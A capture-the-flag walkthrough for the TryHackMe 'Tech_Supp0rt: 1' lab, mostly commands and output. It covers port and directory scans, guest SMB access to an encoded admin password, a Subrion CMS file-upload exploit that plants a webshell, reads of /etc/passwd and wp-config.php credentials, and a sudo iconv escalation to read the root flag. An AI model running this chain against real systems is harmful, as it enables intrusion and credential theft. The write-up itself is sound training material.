6 minutes
THM: Tech_Supp0rt: 1
Title:Tech_Supp0rt: 1
Description:Hack into the scammer's under-development website to foil their plans.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.106.60 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-23 05:33 BST
Nmap scan report for 10.10.106.60
Host is up (0.021s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-08-22T23:08:56
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2025-08-23T04:38:58+05:30
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -7h14m54s, deviation: 3h10m30s, median: -5h24m56s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.32 seconds
Website
Starting with the website it just shows the standard apache holding page, so we run a gobuster scan.
# gobuster dir -u http://10.10.106.60 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.106.60
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/phpinfo.php (Status: 200) [Size: 94928]
/server-status (Status: 403) [Size: 277]
/test (Status: 301) [Size: 311] [--> http://10.10.106.60/test/]
/wordpress (Status: 301) [Size: 316] [--> http://10.10.106.60/wordpress/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Looking through the results we see that 'phpinfo.php is the standard php info test page. The test directory is an example scammer site, and the wordpress directory is a wordpress blog but there is nothing of note on it. We run a wpscan against it which gives some info, but nothing to progress with.
SMB
Now we have a look at the SMB shares, and based on the nmap scan guest access should work. First we list the shares and then we connect as guest with no password.
# smbclient -L 10.10.106.60 -U guest
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
# smbclient //10.10.106.60/websvr -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 08:17:38 2021
.. D 0 Sat May 29 08:03:47 2021
enter.txt N 273 Sat May 29 08:17:38 2021
8460484 blocks of size 1024. 5699516 blocks available
Downloading this file gives us another web directory and some creds.
# cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7s*****************************Ck [cooked with magical formula]
Wordpress creds
|->
When attempt to visit the subrion directory we get redirected to https://10.0.2.15/subrion/subrion/. This indicates there is something in the directory and we need to find an entry point without being redirected. We run a gobuster scan and filter out http redirects (301 and 302).
# gobuster dir -u http://10.10.106.60/subrion/ -w /usr/share/wordlists/dirb/common.txt -b 301,302
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.106.60/subrion/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 301,302
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.swf (Status: 404) [Size: 274]
/favicon.ico (Status: 200) [Size: 1150]
/player.swf (Status: 404) [Size: 274]
/robots.txt (Status: 200) [Size: 142]
/sitemap.xml (Status: 200) [Size: 628]
/swfobject.js (Status: 404) [Size: 274]
/updates (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Subrion
Visiting the robots.txt file we can see a number of entries.
The interesting one is panel, and going there displays a login page for subrion cms.
The password we found early didnt work, but the note indicated it “cooked with magical formula”. We use CyberChef to decode it and it gives a valid looking password.
This credential does indeed work, and we are able to login to the subrion cms admin panel. Once logged in, we can see the version information is displayed.
Use this information we look on exploit-db to find a suitable attack. The exploit works and we get a shell back.
# python3 49876.py -u http://10.10.106.60/subrion/panel/ -l admin -p ********
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.106.60/subrion/panel/
[+] Success!
[+] Got CSRF token: WkO33HKVd0U8GOsvKDCG9Lm0biBmxeln475I2cea
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: iwyqpxuzinymrmg
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.106.60/subrion/panel/uploads/iwyqpxuzinymrmg.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Looking around the system we find 2 useful bits of information - a system username from /etc/passwd and a password in the wordpress config.
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
...
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
mysql:x:111:119:MySQL Server,,,:/nonexistent:/bin/false
$ cat /var/www/html/wordpress/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wpdb' );
/** MySQL database username */
define( 'DB_USER', 'support' );
/** MySQL database password */
define( 'DB_PASSWORD', '******************' );
...
...
Using these discovered details we can login via ssh as a user.
# ssh scamsite@10.10.106.60
scamsite@10.10.106.60's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
120 packages can be updated.
88 updates are security updates.
Last login: Sat Aug 23 05:46:26 2025 from 10.11.18.78
Privilege escalation
Checking out sudo privileges we see there is an entry.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
Checking GTFOBins we find a suitable exploit meaning we can simply cat out the root flag.
scamsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
85************************************0b -